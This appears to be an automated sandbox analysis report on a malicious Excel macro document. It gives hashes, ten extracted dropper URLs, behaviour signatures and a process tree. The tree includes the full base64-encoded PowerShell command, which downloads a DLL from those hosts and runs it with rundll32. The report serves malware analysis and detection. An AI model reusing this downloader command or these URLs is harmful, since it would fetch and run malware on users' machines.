Analysis

  • max time kernel
    120s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    20-11-2024 22:37

General

  • Target

    73938b7c33abea137db59379cfb5480c697197ff03aebeee8921cd82dadf23bd.xls

  • Size

    141KB

  • MD5

    a16fbff1f5cb9686bb89b10e438fa353

  • SHA1

    ed66c497457afb8309866e2cacf62857d9e844c9

  • SHA256

    73938b7c33abea137db59379cfb5480c697197ff03aebeee8921cd82dadf23bd

  • SHA512

    35fce4faf788b1b5e074ee55a4ef2b2956d6a5b22f5fc5d1daa34bfdd5c36ccd85ac5808088d0e8a1cac147f6a4033ed8fd5e55e0930c76cbb2bdc6d74c32642

  • SSDEEP

    3072:P7cKoSsxzNDZLDZjlbR868O8K0c03D38TehYTdeHVhjqabWHLtyeGx6Z84TI0Gxc:zcKoSsxzNDZLDZjlbR868O8K0c03D38X

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://chupahfashion.com/eh6bwxk/bowptl/cLo9eq8v8Vht/

exe.dropper

http://ancyh.xyz/Fox-C/LxAhgyO3fMg/

exe.dropper

http://gravton-dev-cms.policyfest.com/Fox-C/BMOkGelwu/

exe.dropper

https://capitalui.futuristic.agency/wp-admin/hwi9bnmXFFm3doo/

exe.dropper

http://cptdmy.com/zqtr/zdJE0jEOxL/

exe.dropper

https://weviralyou.com/wp-content/yl5qV15jWWfaGdSZLR/

exe.dropper

https://megabyte-xtnegocios.com/ys3v1clw/AKm6Q9/

exe.dropper

https://vmsparamedical.com/urjk0xr/PhfwL/

exe.dropper

https://viprait.com/lag5gn/cdy6k/

exe.dropper

https://comingsoon.futuristic.agency/svg/p4xODmupFbHPnr/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\73938b7c33abea137db59379cfb5480c697197ff03aebeee8921cd82dadf23bd.xls
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2156
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\programdata\ihofbnm.bat" "
      2⤵
      • Process spawned unexpected child process
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2588
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -enc JAByAG8AdwBpAGYAaQB1AGQAPQAiAGgAdAB0AHAAOgAvAC8AYwBoAHUAcABhAGgAZgBhAHMAaABpAG8AbgAuAGMAbwBtAC8AZQBoADYAYgB3AHgAawAvAGIAbwB3AHAAdABsAC8AYwBMAG8AOQBlAHEAOAB2ADgAVgBoAHQALwAsAGgAdAB0AHAAOgAvAC8AYQBuAGMAeQBoAC4AeAB5AHoALwBGAG8AeAAtAEMALwBMAHgAQQBoAGcAeQBPADMAZgBNAGcALwAsAGgAdAB0AHAAOgAvAC8AZwByAGEAdgB0AG8AbgAtAGQAZQB2AC0AYwBtAHMALgBwAG8AbABpAGMAeQBmAGUAcwB0AC4AYwBvAG0ALwBGAG8AeAAtAEMALwBCAE0ATwBrAEcAZQBsAHcAdQAvACwAaAB0AHQAcABzADoALwAvAGMAYQBwAGkAdABhAGwAdQBpAC4AZgB1AHQAdQByAGkAcwB0AGkAYwAuAGEAZwBlAG4AYwB5AC8AdwBwAC0AYQBkAG0AaQBuAC8AaAB3AGkAOQBiAG4AbQBYAEYARgBtADMAZABvAG8ALwAsAGgAdAB0AHAAOgAvAC8AYwBwAHQAZABtAHkALgBjAG8AbQAvAHoAcQB0AHIALwB6AGQASgBFADAAagBFAE8AeABMAC8ALABoAHQAdABwAHMAOgAvAC8AdwBlAHYAaQByAGEAbAB5AG8AdQAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHkAbAA1AHEAVgAxADUAagBXAFcAZgBhAEcAZABTAFoATABSAC8ALABoAHQAdABwAHMAOgAvAC8AbQBlAGcAYQBiAHkAdABlAC0AeAB0AG4AZQBnAG8AYwBpAG8AcwAuAGMAbwBtAC8AeQBzADMAdgAxAGMAbAB3AC8AQQBLAG0ANgBRADkALwAsAGgAdAB0AHAAcwA6AC8ALwB2AG0AcwBwAGEAcgBhAG0AZQBkAGkAYwBhAGwALgBjAG8AbQAvAHUAcgBqAGsAMAB4AHIALwBQAGgAZgB3AEwALwAsAGgAdAB0AHAAcwA6AC8ALwB2AGkAcAByAGEAaQB0AC4AYwBvAG0ALwBsAGEAZwA1AGcAbgAvAGMAZAB5ADYAawAvACwAaAB0AHQAcABzADoALwAvAGMAbwBtAGkAbgBnAHMAbwBvAG4ALgBmAHUAdAB1AHIAaQBzAHQAaQBjAC4AYQBnAGUAbgBjAHkALwBzAHYAZwAvAHAANAB4AE8ARABtAHUAcABGAGIASABQAG4AcgAvACIALgBTAHAAbABpAHQAKAAiACwAIgApADsAZgBvAHIAZQBhAGMAaAAoACQAcwB0ACAAaQBuACAAJAByAG8AdwBpAGYAaQB1AGQAKQB7ACQAcgByAHkAaQB1AGQAPQBHAGUAdAAtAFIAYQBuAGQAbwBtADsAJABmAGcAaABpAHUAcwA9AEcAZQB0AC0AUgBhAG4AZABvAG0AOwAgACQARwBzAHIARgBKAFkAagBkADUANAA2AGQAcwA9ACIAYwA6AFwAcAByAG8AZwByAGEAbQBkAGEAdABhAFwAIgArACQAcgByAHkAaQB1AGQAKwAiAC4AZABsAGwAIgA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHMAdAAgAC0ATwB1AHQARgBpAGwAZQAgACQARwBzAHIARgBKAFkAagBkADUANAA2AGQAcwA7AGkAZgAoAFQAZQBzAHQALQBQAGEAdABoACAAJABHAHMAcgBGAEoAWQBqAGQANQA0ADYAZABzACkAewBpAGYAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQARwBzAHIARgBKAFkAagBkADUANAA2AGQAcwApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADUAMAAwADAAMAApAHsAJABnAGgARABEAEYASgBIAGsANQBmAD0AIgBjADoAXAB3AGkAbgBkAG8AdwBzAFwAcwB5AHMAdwBvAHcANgA0AFwAcgB1AG4AZABsAGwAMwAyAC4AZQB4AGUAIgA7ACQAdAB5AGkAZAB1AGkAcwBkAGYAZgA9ACQARwBzAHIARgBKAFkAagBkADUANAA2AGQAcwArACIALABmACIAKwAkAGYAZwBoAGkAdQBzADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZwBoAEQARABGAEoASABrADUAZgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAkAHQAeQBpAGQAdQBpAHMAZABmAGYAOwBiAHIAZQBhAGsAOwB9AH0AfQA=
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1752

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\ihofbnm.bat

    Filesize

    3KB

    MD5

    d7f8d77efca69f7600e190537d147b6c

    SHA1

    9709843ea19f342b3a95075588c4b6fdb688623d

    SHA256

    8fe05c046c282ee13765fb78ba5b27201571a74a46dbc901898255c111727caf

    SHA512

    dd975f74367e9ddaed18e0630556f14f8bd32f5e89ec13b92f933cbdfc32951e61b4da406407cb7e7cd37a2fe41726c200a0c1377ac8686f835eccfec599b5e2

  • memory/2156-33-0x00000000003D0000-0x00000000004D0000-memory.dmp

    Filesize

    1024KB

  • memory/2156-5-0x00000000003D0000-0x00000000004D0000-memory.dmp

    Filesize

    1024KB

  • memory/2156-4-0x00000000003D0000-0x00000000004D0000-memory.dmp

    Filesize

    1024KB

  • memory/2156-25-0x00000000003D0000-0x00000000004D0000-memory.dmp

    Filesize

    1024KB

  • memory/2156-8-0x00000000003D0000-0x00000000004D0000-memory.dmp

    Filesize

    1024KB

  • memory/2156-23-0x00000000003D0000-0x00000000004D0000-memory.dmp

    Filesize

    1024KB

  • memory/2156-6-0x00000000003D0000-0x00000000004D0000-memory.dmp

    Filesize

    1024KB

  • memory/2156-24-0x00000000003D0000-0x00000000004D0000-memory.dmp

    Filesize

    1024KB

  • memory/2156-15-0x00000000003D0000-0x00000000004D0000-memory.dmp

    Filesize

    1024KB

  • memory/2156-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2156-34-0x00000000003D0000-0x00000000004D0000-memory.dmp

    Filesize

    1024KB

  • memory/2156-32-0x00000000003D0000-0x00000000004D0000-memory.dmp

    Filesize

    1024KB

  • memory/2156-31-0x00000000003D0000-0x00000000004D0000-memory.dmp

    Filesize

    1024KB

  • memory/2156-30-0x00000000003D0000-0x00000000004D0000-memory.dmp

    Filesize

    1024KB

  • memory/2156-29-0x00000000003D0000-0x00000000004D0000-memory.dmp

    Filesize

    1024KB

  • memory/2156-28-0x00000000003D0000-0x00000000004D0000-memory.dmp

    Filesize

    1024KB

  • memory/2156-27-0x00000000003D0000-0x00000000004D0000-memory.dmp

    Filesize

    1024KB

  • memory/2156-35-0x00000000003D0000-0x00000000004D0000-memory.dmp

    Filesize

    1024KB

  • memory/2156-26-0x00000000003D0000-0x00000000004D0000-memory.dmp

    Filesize

    1024KB

  • memory/2156-1-0x0000000071E8D000-0x0000000071E98000-memory.dmp

    Filesize

    44KB

  • memory/2156-9-0x0000000006580000-0x0000000006680000-memory.dmp

    Filesize

    1024KB

  • memory/2156-3-0x00000000003D0000-0x00000000004D0000-memory.dmp

    Filesize

    1024KB

  • memory/2156-7-0x00000000003D0000-0x00000000004D0000-memory.dmp

    Filesize

    1024KB

  • memory/2156-22-0x00000000003D0000-0x00000000004D0000-memory.dmp

    Filesize

    1024KB

  • memory/2156-21-0x00000000003D0000-0x00000000004D0000-memory.dmp

    Filesize

    1024KB

  • memory/2156-20-0x00000000003D0000-0x00000000004D0000-memory.dmp

    Filesize

    1024KB

  • memory/2156-19-0x00000000003D0000-0x00000000004D0000-memory.dmp

    Filesize

    1024KB

  • memory/2156-18-0x00000000003D0000-0x00000000004D0000-memory.dmp

    Filesize

    1024KB

  • memory/2156-17-0x00000000003D0000-0x00000000004D0000-memory.dmp

    Filesize

    1024KB

  • memory/2156-16-0x00000000003D0000-0x00000000004D0000-memory.dmp

    Filesize

    1024KB

  • memory/2156-14-0x00000000003D0000-0x00000000004D0000-memory.dmp

    Filesize

    1024KB

  • memory/2156-13-0x00000000003D0000-0x00000000004D0000-memory.dmp

    Filesize

    1024KB

  • memory/2156-12-0x00000000003D0000-0x00000000004D0000-memory.dmp

    Filesize

    1024KB

  • memory/2156-11-0x00000000003D0000-0x00000000004D0000-memory.dmp

    Filesize

    1024KB

  • memory/2156-10-0x00000000003D0000-0x00000000004D0000-memory.dmp

    Filesize

    1024KB

  • memory/2156-47-0x0000000071E8D000-0x0000000071E98000-memory.dmp

    Filesize

    44KB

  • memory/2156-48-0x00000000003D0000-0x00000000004D0000-memory.dmp

    Filesize

    1024KB

  • memory/2156-49-0x00000000003D0000-0x00000000004D0000-memory.dmp

    Filesize

    1024KB

  • memory/2156-50-0x00000000003D0000-0x00000000004D0000-memory.dmp

    Filesize

    1024KB

  • memory/2156-51-0x00000000003D0000-0x00000000004D0000-memory.dmp

    Filesize

    1024KB

  • memory/2156-52-0x00000000003D0000-0x00000000004D0000-memory.dmp

    Filesize

    1024KB